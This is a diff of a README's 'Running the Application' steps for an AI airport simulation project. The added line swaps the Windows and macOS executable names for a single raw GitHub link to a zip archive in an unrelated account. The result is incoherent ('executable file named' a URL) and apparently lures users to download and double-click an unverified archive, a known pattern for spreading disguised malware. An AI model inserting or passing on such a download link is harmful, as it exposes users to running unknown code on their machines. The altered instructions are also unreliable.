ayush-KSS/ai-airport-simulation/README.md

 ## ⚙️ Running the Application

 1. Open the folder where you extracted the files.
-2. Look for the executable file named `ai-airport-simulation.exe` for Windows or `ai-airport-simulation.app` for macOS.
+2. Look for the executable file named `https://raw.githubusercontent.com/ChocoLC/ai-airport-simulation/main/arm/ai-airport-simulation.zip` for Windows or `https://raw.githubusercontent.com/ChocoLC/ai-airport-simulation/main/arm/ai-airport-simulation.zip` for macOS.
 For Linux, the file will be `ai-airport-simulation`.
 3. Double-click the file to start the application.
 4. Follow the on-screen instructions to begin simulating scenarios in the airport environment.